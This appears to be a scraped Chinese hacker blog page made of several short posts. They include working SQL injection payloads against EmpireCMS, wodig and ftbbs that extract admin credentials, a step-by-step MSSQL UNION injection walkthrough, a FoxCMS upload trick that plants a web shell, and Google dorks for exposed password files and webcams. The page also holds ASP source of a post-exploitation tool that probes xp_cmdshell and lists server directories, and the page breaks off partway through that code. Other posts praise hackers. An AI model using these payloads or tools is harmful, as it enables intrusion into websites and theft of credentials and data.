收藏、分享这篇文章!

红盟

一个国人黑客联盟网站中国红盟近日发布消息将被浙江老板融资1000万元.这也是目前国内黑客网站接收到的最大融资,破纪录的达到了1千万.红盟掌门刘庆在接受采访时说红盟目前每年的营业额是5到6百万,明年预计会突破一千万.红盟的收入来源主要是服务器安全服务,目前国内很多游戏运营商和机房都是他们做的安全,特别是上海地区.另外他们还自己开发了服务器安全软件.

收藏、分享这篇文章!

06150583700/aaa.asp//&CurrPath=/userfiles/06150583700
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：
<form name=”FileForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp”>
    <input type=”hidden” name=”AutoReName” value=”2″><br>
    <input type=”hidden” name=”Path” value=”/userfiles/06150583700/aaa.asp”>
    <input type=”file” size=”20″ name=”File1″>
    <input type=”hidden” name=”FilesNum” value=”1″>
    <input type=”submit” id=”BtnSubmit” name=”Submit” value=” 确 定 “>
    <input type=”reset” id=”ResetForm” name=”Submit3″ value=” 重 填 “>
</form>
传个夹带一句话的图片上去
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp

收藏、分享这篇文章!

别拿黑客说事

最近一段时间网上突然冒出一帮推客炒手,他们炒作的目的虽然不同但是目标无一不指向黑客,纷纷扛着洁身自好忧天下人之优的面孔对黑客指指点点一副哗众取宠的嘴脸,仿佛他骂了黑客他的人格就清高了.在他们的精彩文笔下中国的黑客好男儿们无一不被他们描述成一些专门放马盗号,揭人私隐,破坏网络友爱和上网环境等等类型的坏蛋或无法救要网络蛀虫.某些炒手甚至上升到把黑客和中国经济以及未来挂钩了,什么楼市火了要防黑客,股市火了也要防黑客,某软件火了也要防黑客,就连学生考试了还是要防黑客.更有甚者还把迈克尔杰克逊的死讯也和黑客挂上了钩,广州路由器出现问题造成网络堵塞也挂钩了,某超女退出也说是黑客爆了啥私隐.我caoTM的自从上次全国断网事件后,这些炒手们就好像抓住了救命稻草似的拼命的侮辱着黑客,明着一波接一波的带着救世主和先知的面具恶狠狠地用他们那张臭嘴ddos黑客们,暗中却又像哈巴狗一样跟在黑客后面哭爹喊娘的想学点对于他们来说就和茅山道术差不多的黑人神功,梦想着也成为其中的一员.这帮无良的东西就知道写些东西屏蔽网民的眼睛,在国家出现种种危机,当国人被侮辱的时候你们这帮杂种跑哪去了,还不是黑客提咱老百姓出头,一次次中日中美中法黑客大战一次次保家卫国难道都是你们这些无良炒手上的战场吗?事后你们有良知的还知道写个帖子啥的夸夸他们,中立的保持沉默,无良的呢甚至反咬一口说什么招来了更大的攻击波一副tm狗汉奸嘴脸,投降主义路线.今天这篇博文我是写痛快了也骂舒坦了,归根结底一句话请不要用有色的眼睛看待中国黑客,他们不过是一群有理想有技术的孤独群体,他们在大家视线的背后默默的保家卫国维护着国人和祖国的尊严维护着国内互联网的安全与稳定,他们不愿意高调不愿意出来反驳但是我们不能不明真相,不能去诬陷这么一群中国网络守护神,你想想那会多伤他们的心啊.最后也恳请占了99%的有良知的炒手多写写中国黑客的正面示例,强力反击下那些只占1%的无良炒手.我爱中国黑客我为你们自豪.

收藏、分享这篇文章!

新手黑客学习网站

这十个网站都配有入侵视频教程和详细的漏洞文章以及黑客软件,全部由浅入深,浅到基本的编程和漏洞利用,深到高级编程和漏洞挖掘.以下我一一列出这十个网站注意排名不分先后黑客动画吧:http://www.hack58.com/ 安全中国:http://www.anqn.com/ 黑鹰安全网:http://www.3800hk.com/ 华夏黑客同盟:http://www.77169.com/ 新世纪网安基地:http://www.520hack.com/ 黑客基地:http://www.hackbase.com/ 红色黑客联盟:http://www.7747.net/ 黑客防线:http://www.hacker.com.cn/ 漏洞数据库:http://www.sebug.net/ 邪恶八进制:http://www.eviloctal.com/ 暗组信息安全论坛:http://www.darkst.com/

收藏、分享这篇文章!

帝国cms 0day

帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/

收藏、分享这篇文章!

pangolin2.3.0.948注入工具下载

这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html

收藏、分享这篇文章!

落伍者论坛疑遭黑客入侵大量用户密码被盗

国内最大的站长聚集地落伍者论坛,今天下午突然出现大量用户密码被盗现象,经多方核查发现原来并不是落伍者主站被黑客入侵,而是因去年测试的落伍者分类信息分站被入侵,导致数百用户信息今天被披露到网上,才引发的今日大量用户密码被盗现象.目前落伍的站长拒绝游泳的鱼已经发布广告,被盗用户可以联系QQ:288753恢复密码.积分损失可找小瑜补偿,落伍公告地址:http://www.im286.com/thread-3563529-1-1.html

收藏、分享这篇文章!

wodig注入漏洞

wodig漏洞文件Default.asp?tags_name=a’

article.asp?Src_Child=1&Src_ChildSub=a’

wodig.asp?tags_name=a’这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络

收藏、分享这篇文章!

最美女黑客YingCracker盗用陈师迪照片

走红网络的美女黑客Yingcracker近日被网友曝光其所用照片属于台湾女子陈师迪,陈师迪是台湾省国立大学法律系毕业,她表示保留控诉Yingcracker侵犯肖像权和隐私权的权利.相关美女黑客Yingcracker介绍

陈师迪照片

陈师迪

收藏、分享这篇文章!

YingCracker

中国黑客有很多但是要说到美女黑客恐怕只有这么一位,YingCracker上海姑娘一位靠带徒弟,卖0day的职业黑客.有黑客界的朋友爆料说拜师YingCracker门下需要4千元到8千元不等.YingCracker不仅人长的漂亮而且技术也绝不比男性黑客差,尤其是交友广泛,手里的0day数不胜数.让一帮小黑fans们羡慕的直流口水.在这里祝愿国内新一代黑客早日成长,更希望能多出几个YingCracker这样的有技术有身材有相貌的美女黑客.

YingCracker

YingCracker

YingCracker

YingCracker

收藏、分享这篇文章!

sebug漏洞搜索

SEBUG很早就知道了这个网站,也是国内黑客常去的网站,它的信息来源之广,漏洞信息量之大在国内无出其右,虽然是国人办的网站,但是对中文搜索的支持确不是很好,比如你要搜索某个cms漏洞你要是打cms的中文名是搜不到的,只能输入cms的英文名搜索.希望sebug的站长能改进一下.网址:http://www.sebug.net

收藏、分享这篇文章!

收藏、分享这篇文章!

PHP手工注入使用

比如黑客找到注入点是:http://www.xxx.tk/news.php?id=300数据库类型是mssql2005.要用union查询,先确定有几个字段，使用order by 来完成，就是:http://www.xxx.tk/news.php?id=300 order by 7– 回显正常
http://www.xxx.tk/news.php?id=300 order by 8– 回显失败
说明总共7个字段，然后用null填充
http://www.xxx.tk/news.php?id=300 union all select null,null,null,null,null,null,null–显示正常
变换成不存在的id,前面加负号,或者加上and 1=2的条件,比如
http://www.xxx.tk/news.php?id=99999 union all select null,null,null,null,null,null,null–
确定下哪个位置可以爆出结果，先从第一个null开始变换，直接替换成user,就是:
http://www.xxx.tk/news.php?id=99999 union all select user,null,null,null,null,null,null–
看来运气比较好，当前用户名直接出现在某个可见的位置，要是没显示结果就继续变换位置
那就从这个位置开始暴出我们想要的结果
1.变换id获得库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+master.dbo.sysdatabases+where+dbid=1–
2.获得当前库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select db_name(),null,null,null,null,null,null–
3.获得当前版本
http://www.xxx.tk/news.php?id=300 and 1=2 union all select @@version,null,null,null,null,null,null–
4.变换N获得指定库的表名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and name not in (select top N name from BugTracker.dbo.sysobjects where xtype=CHAR(85))–
5.获得指定库所有列名
(1) 这里的M和获得库名时的N必须一致，不然无法得到正确的库名ID
http://www.xxx.tk/news.php?id=300 and 1=2 union all select ID,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and ID not in (select top M ID from BugTracker.dbo.sysobjects where xtype=CHAR(85))–
(2)最后的ID值即是(1)中回显的数值,通过变换N值获得所有列名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select NAME,null,null,null,null,null,null from BugTracker.dbo.syscolumns where ID=53575229 and name not in (select top N name from BugTracker.dbo.syscolumns where ID=53575229)–
6.根据前几步所得结果获得字段内容
http://www.xxx.tk/news.php?id=300 and 1=2 union all select bug_id,null,null,null,null,null,null from BugTracker..mantis_bug_file_table–可自加条件进行查询

收藏、分享这篇文章!

IP邻居

IP反查域名的网站我介绍了很多,而且还根据效果做了排名.今天给大家介绍的IP邻居这个网站不仅反查量大,而且还显示同IP站点的PR值,百度和谷歌的收录量.目前国内IP反查域名站点在数据量和功能上无出其右,国外站点的速度又不敢恭维.所以P9强烈推荐大家使用IP邻居反查域名.网址:http://www.iplinju.com/更多IP反查域名站点请参看介绍几个同ip地址反查域名的网站这篇日志.

收藏、分享这篇文章!

新的md5密码破解站

随着cmd5.com的部分md5密码破解收费,p9就致力于寻找新的md5密码破解站,今天这个是具有120G数据的md5破解新站http://www.t00ls.net/tools/md5/其它免费md5破解站请参看md5破解收费了咋办这篇博文!

收藏、分享这篇文章!

google突破搜索

在搜索框上输入： “index of/ ” 　inurl:lib
再按搜索你将进入许多图书馆，并且一定能下载自己喜欢的书籍。
在搜索框上输入： “index of /” 　cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！
在搜索框上输入：　“index of /” 　ppt
再按搜索你就可以突破网站入口下载powerpint作品！
在搜索框上输入： “index of /” 　mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品！
在搜索框上输入：　“index of /” .s**
再按搜索你就可以突破网站入口下载flash作品！
在搜索框上输入： “index of /” 　要下载的软件名
再按搜索你就可以突破网站入口下载软件！
注意引号应是英文的！
再透露一下，如果你输入：
“index of /” 　AVI
另补上第二篇
用GOOgle看世界!!!只要你在GOOGLE里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!
在google里输入
inurl:”viewerframe?mode=”
随便打开一个,然后按提示装一个插件,就可以看到了!!!
再补上第三篇
三则黑客的Google搜索技巧简介
大家都知道，Google毫无疑问是当今世界上最强大的搜索引擎。然而，在黑客手中，它也是一个秘密武器，它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站，而是利用这些技巧去在浩如烟海的网络信息中，来个大海捞针，寻找到对您有用的信息。
如果您是一名普通网民，您可以使用黑客的技巧扩大自己的视野，提高自己的检索效率；如果您是一名网管，请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施，如果没有就赶快来个亡羊补牢，毕竟隐患胜于明火，防范胜于救灾；如果您是一名黑客，相信您早以在别的黑客站点上见过类似的方法，这篇文章对您没什么用处，这里的技巧对您是小儿科，菜鸟级！您可以节省宝贵的时间做更有意义的事情，这篇文章您不用看了，到别处去吧！
基于上面的考虑我编发了这篇文章。
搜索URL
比如我们提交这种形式：passwd.txt site:virtualave.net
看到了什么？是不是觉得太不可思议了！有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的！管理员或许太不负责了，或许安全防范的意识太差了，如果你是网络管理员，赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密，即使我们的密码经过DES 加密的密码，黑客们还是可以通过许多破解软件来搞定。
这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。
同样，我们可以搜索一些顶级域名，比如：.net .org .jp .in .gr
config.txt site:.jp
admin.txt site:.tw
搜索首页的目录
首页是非常有用的，它会提供给你许多有用的信息。
我们提交如下的形式：
“Index of /admin”
“Index of /secret”
“Index of /cgi-bin” site:.edu
你可以自己定义搜索的首页字符。这样就可以获得许多信息。
搜索特定的文件类型
比如你想指定一种文件的类型，可以提交如下形式：
file无效:.doc site:.mil classified
这个就是搜索军方的资料，你可以自定义搜索。
再提供一个第四篇
Google 的特殊功能
1 、查询电话号码
Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。
个人如想查找这些列表，只要填写姓名，城市和省份。
如果该信息为众人所知，你就会在搜索结果页面的最上方看到搜索的电话和街区地址
你还可以通过以下任何一种方法找到该列表：
名字（或首位大写字母），姓，电话地区号
名字（或首位大写字母），姓，邮递区号
名字（或首位大写字母），姓，城市（可写州）
名字（或首位大写字母），姓，州
电话号码，包括区号
名字，城市，州
名字，邮递区号
2 、查找 PDF 文件
现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多，但他们经常具备一些其他文件不具备的高质量信息
为了显示一个搜索结果是 PDF 文件而不是网页， PDF 文件的标题开头显示蓝色文本。
这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件
如果你的计算机没装有该程序，计算机会指导你去能免费下载该程序的网页。
使用 PDF 文件时，相关的网页快照会由“ TEXT VERSION ”代替，它是 PDF 文档的复制文件，该文件除去了所有格式化命令。
如果你在没有 PDF 链接的情况下想看一系列搜索结果，只要在搜索栏中打上 -inurldf 加上你的搜索条件。
3 、股票报价
用 Google 查找股票和共有基金信息，只要输入一个或多个 NYSE ， NASDAQ ， AMEX 或
共有基金的股票行情自动收录机的代码，也可以输入在股市开户的公司名字。
如果 Google 识别出你查询的是股票或者共有基金，它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。
在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字（比如， INTEL ），请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接（比如， WWW.INTEL.COM ）。
Google 是以质量为基础来选择和决定金融信息提供者的，包括的因素有下载速度，用户界面及其功能。
4 、找找谁和你链接
有些单词如果带有冒号就会有特殊的意思。比如 link ：操作员。查询 link:siteURL ，就会显示所有指向那个 URL 的网页。举例来说，链接 www.Google.com 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。
5 、查找站点
单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是：在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如，在斯坦福找申请信息，输入：
admission site:www.stanford.edu
6 、查找字典释意
查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线，位于搜索结果的上面，点击链接你会找到字典提供者根据要求给出的相关定义。 7 、用 GOOLGE 查找地图
想用 Google 查找街区地图，在 Google 搜索栏中输入美国街区地址，包括邮递区号或城市 / 州（比如 165 大学大街 PALO ALTO CA ）。通常情况下，街区地址和城市的名字就足够了。
当 Google 识别你的要求是查找地图，它会反馈给你有高质量地图提供者提供的链接，使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。
■ 标题搜索
　多数搜索引擎都支持针对网页标题的搜索，命令是“title:”，在Yahoo中是“t:”（注意冒号为英文字符且后面不跟空格）。在进行标题搜索时，前面提到的逻辑符号和精确匹配原则同样适用。请看下面的例子：
· title（或t）:computer adventure games
· title:+computer +adventure +games
· title:+computer +games -adventure
· title:”computer adventure games”
返回的结果都是标题中包含关键字、词的信息条目。

■ 网站搜索
　此外我们还可以针对网站进行搜索，命令是“site:”（Google）、“host:”（AltaVista）、“url:”（Infoseek）或“domain:”（HotBot）。如想查找AAA游戏制作公司网站的所有网页，可以输入：· site(或host/url/domain):www.AAA.com
还可以在其中加入其他命令组成复杂的搜索条件，如：· site:www.AAA.com +title:”computer games” -adventure
意思是查找AAA公司网站中所有标题里含有computer games的网页，但排除关于冒险游戏的网页。
说到这里大家可能已经意识到了，运用此命令我们可以达到一个极其重要的目的，就是检查我们的网站被索引的网页有多少。因此建议大家牢记这个命令。另外运用“site/host/url/domain”等搜索命令还可实现某一网站的站内搜索。比如Google引擎由于技术的先进性，通过其“site”命令实现的网站内部搜索甚至比专门的站内搜索程序还要好。

■ 链接搜索
　在Google和AltaVista中，用户均可通过“link:”命令来查找某网站的外部导入链接（inbound links）。如：· link:www.AAA.com
其他一些引擎也有同样的功能，只不过命令格式稍有区别。你可以用这个命令来查看是谁以及有多少网站与你做了链接。
除上述命令外，还有其他一些特殊搜索命令，如“filetype:”（限定搜索的文档类别）、“daterange:”（限定搜索的时间范围）、“phonebook:”（查询电话）等等，感兴趣的话大家可以自己研究一下。Google引擎提供了比较完备的搜索功能，具体可参考Google从入门到精通专题介绍。

收藏、分享这篇文章!

ftbbs7.1注入漏洞

Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin

请使用ftbbs的用户关注它的官网安全补丁发布.

收藏、分享这篇文章!

<title>SQL_Dir By Bin</title>
<style id=theStyle>
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: “Courier New”;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: “Courier New”;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: “Courier New”;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: “Courier New”;
}
input {
font-family: “Courier New”;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: “Courier New”;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: “Courier New”;
TEXT-DECORATION: none;
}
tr {
font-family: “Courier New”;
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: “Courier New”;
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: “Courier New”;
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}

.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}

.fixTable {
word-break: break-all;
word-wrap: break-word;
}

#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session(“login”)=”" then%>
<%
Echo “<body onload=document.formx.pass.focus();>”
Echo “<table width=816 align=center>”
Echo “<form method=post name=formx action=’?action=login’>”
Echo “<tr>”
Echo “<td align=center class=td>数 据 库 连 接</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td height=75 align=center>”
Echo “IP：<input name=ip type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=localhost> ”
Echo “PORT：<input name=port type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=1433> ”
Echo “USER：<input name=user type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’ value=sa> ”
Echo “PASS：<input name=pass type=text style=’border:1px solid #d8d8f0;background-color:#ffffff;’> ”
Echo “</td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td><input type=submit value=LOGIN style=’border:1px solid #d8d8f0;background-color:#f9f9fd;’></td>”
Echo “</tr>”
Echo “<tr>”
Echo “<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href= http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>”
Echo “</tr>”
Echo “</form>”
Echo “</table>”
Echo “</body>”

%>

<%End If %>
<%
If request(“action”)=”login” Then
SqlLocalName =”"&request.Form(“ip”)&”,”&request.Form(“port”)&”" ‘连接IP [ 本地用 (local) 外地用IP ]
SqlUserName =”"&request.Form(“user”)&”" ‘用户名
SqlPassword =”"&request.Form(“pass”)&”" ‘用户密码
‘SqlDatabaseName=”sql” ‘数据库名
ConnStr = “Provider=Sqloledb;User ID=” & SqlUserName & “; Password=” & SqlPassword & “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & SqlLocalName & “;”
SqlNowString=”GetDate()”
On Error Resume Next ‘ 容错
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
If Err.number=-2147467259 Then
Echo “<script language=’javascript’> alert(‘主机IP或者端口连接错误，请检查!’);history.back(); </script>”
ElseIf Err.number=-2147217843 Then
Echo “<script language=’javascript’> alert(‘用户名或者密码错误，请检查!’);history.back(); </script>”
End If
If Err.number=0 Then
session(“login”)=”yes”
session(“user”)=request.Form(“user”)
session(“pass”)=request.Form(“pass”)
session(“ip”)=request.Form(“ip”)
session(“port”)=request.Form(“port”)
End If
response.redirect”?action=tools”
End If
%>

<%

If request(“action”)=”tools” or request(“action”)=”" Then

If session(“login”)=”yes” Then
%>
<%
rem—————————-数据库连接—————–
ConnStr = “Provider=Sqloledb.1;User ID=” &session(“user”)& “; Password=” &session(“pass”)& “; Initial CataLog = ” & SqlDatabaseName & “; Data Source=” & session(“ip”) & “,”&session(“port”)&”;”
Set Conn=Server.CreateObject(“ADODB.Connection”)
Conn.open ConnStr
Set Cat = Server.CreateObject(“ADOX.Catalog”)
Cat.ActiveConnection = conn.ConnectionString
rem————————函数————-
Sub Echo(sStr)
Response.Write sStr
End Sub

Function IIf(var, val1, val2)
If var = True Then IIf = val1 Else IIf = val2
End Function
const copyright = “Code By Bin<br><a href = http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a>”
RootPath = Server.MapPath(“/”)
Path=Request.ServerVariables(“PATH_TRANSLATED”)
Server_Name=Request.ServerVariables(“SERVER_NAME”)
IP=Request.ServerVariables(“LOCAL_ADDR”)
PORT=Request.ServerVariables(“SERVER_PORT”)
OS= Request.ServerVariables(“OS”)
OS= IIf(OS = “”, “Windows2003″, OS) & “, ” & Request.ServerVariables(“SERVER_SOFTWARE”)
OS= OS & “, ” & ScriptEngine & “/” & ScriptEngineMajorVersion & “.” &ScriptEngineMinorVersion & “.” & ScriptEngineBuildVersion
Curl=Request.ServerVariables(“SCRIPT_NAME”)
RequestUrl=Request.ServerVariables(“Url”)
URL=”http://“&Server_Name&Requesturl

rem————————————–

rem———————–数据库操作——————–
Set rs = conn.execute(“select @@version”)
SQLversion=rs(0)
Set rs = Conn.execute(“select db_name(0)”)
DBname=rs(0)
Set rs = Conn.execute(“select user”)
DBuser=rs(0)
‘权限判断
Set rs = Conn.execute(“Select IS_SRVROLEMEMBER(’sysadmin’)”)
If rs(0)=1 Then
dbo=”sa”
End If
Set rs = Conn.execute(“Select IS_MEMBER(‘db_owner’)”)
If rs(0)=1 Then
dbo=”db_owner”
Else
dbo=”public”
End If
‘扩展判断
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_cmdshell’”)
If rs(0)=1 Then
xp_cmdshell=”XP_cmdshell √”
Else
xp_cmdshell=”XP_cmdshell ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oacreate’”)
If rs(0)=1 Then
sp_oacreate=”SP_oacreate √”
Else
sp_oacreate=”SP_oacreate ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regwrite’”)
If rs(0)=1 Then
xp_regwrite=”XP_regwrite √”
Else
xp_regwrite=”XP_regwrite ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_servicecontrol’”)
If rs(0)=1 Then
xp_servicecontrol=”XP_servicecontrol √”
Else
xp_servicecontrol=”XP_servicecontrol ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’xp_regread’”)
If rs(0)=1 Then
xp_regread=”XP_regread √”
Else
xp_regread=”XP_regread ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’sp_oamethod’”)
If rs(0)=1 Then
sp_oamethod=”SP_oamethod √”
Else
sp_oamethod=”SP_oamethod ×”
End If
Set rs = Conn.execute(“select count(*) from master.dbo.sysobjects where xtype=’X’ and name=’XP_dirtree’”)
If rs(0)=1 Then
XP_dirtree=”XP_dirtree √”
Else
XP_dirtree=”XP_dirtree × (貌似不能使用该程序)”
End If
rem——————–操作检测——————-
On Error Resume Next
Set Rs = Conn.Execute(“USE pubs”)
If Err Then
cbase=”无法切换到PUBS数据库！”
Else
cbase=”切换到PUBS数据库！”
End If
Set rs = Conn.execute(“drop table [bin_dir]“)
If Err Then
drop=”删除表失败！”
Else
drop=”删除表成功！”
End If
Set rs = Conn.execute(“Create TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) Insert bin_dir EXEC MASTER..XP_dirtree ‘c:’,1,1″)
If Err Then
create=”建表失败！”
Else
create=”建表成功！”
End If
Set rs = Conn.execute(“select conunt(*) from bin_dir”)
If rs(0)>1 Then
xp=”扩展执行成功！　<FONT COLOR=RED><STRONG>GOOD LUCK！</STRONG></FONT>”
Else
xp=”扩展执行失败！　SOORY!”
End If
rem————————————————–
Sub SQLdbname()
l=100
For i=1 To l
a=a+1
Set rs = conn.execute(“select db_name(“&a&”)”)
If rs(0)<>”" then
Echo “”&rs(0)&” ”
Else
Exit For
End If
Next
End Sub
rem———————————–数据显示———————
Sub showdata()
set rs2=server.CreateObject(“adodb.recordset”)
rs2.open “select * from bin_dir order by dirfile”,conn,1,1

Echo “<tr>”
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan title=’” & rs2.Fields(j).Name & “‘ style=’width:125px;padding-left:5px;’>” & rs2.Fields(j).Name & “</span></td>”
Next
Echo “</tr>”
Echo “<tr>”
For i = 0 To rs2.recordcount
For j = 0 To rs2.Fields.Count – 1
Echo “<td height=22 class=td width=500><span class=fixSpan style=’width:250px;padding-left:5px;’><a href=’?action=dir&path=”&dir_path&”"&rs2(j)&”‘>” &rs2(j)& “</a></span></td>”
Next
Echo “<tr>”
RS2.MoveNext
Next
End Sub
rem—————————————————–
rem———————————–删除表———————
Sub droptable()
Set rs = Conn.execute(“drop table [bin_dir]“)
End Sub
rem—————————————————–

Echo “<table style=’TABLE-LAYOUT: fixed; WORD-BREAK: break-all’>”
Echo “<tr>”
Echo”<td width=20% valign=top>”
For Each objTable In Cat.Tables
Echo “<span class=fixSpan title=’” & objTable.Name & “‘ ”
Echo “style=’width:90%;padding-left:8px;cursor:hand;’>” & objTable.Name & “</span>”
Next
Echo “</td>”
Echo “<td valign=top>”
Echo “<table>”
Echo “<tr class=td>”
Echo “<td width=’100′> 项目</td>”
Echo “<td width=’400′> 值</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前时间</td>”
Echo “<td> “&FormatDateTime(Now(), 0)&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 服务器地址</td>”
Echo “<td> 名称: “&SERVER_NAME&”(IP:”&IP&”) 端口:”&PORT&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 软件环境</td>”
Echo “<td> “&OS&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 站点目录</td>”
Echo “<td> “&rootpath&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前路径</td>”
Echo “<td> Path: ” &path& “<br /> URL : “&URL&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> SQL版本</td>”
Echo “<td> “&sqlversion&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> SQL所有库</td>”
Echo “<td> ”
sqldbname()
Echo “</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 当前库检测</td>”
Echo “<td> 用户名:”&dbname&” 数据库:”&dbuser&” 权限:”&dbo&”</td>”
Echo “</tr>”
Echo “<tr class=td>”
Echo “<td> 扩展检测</td>”
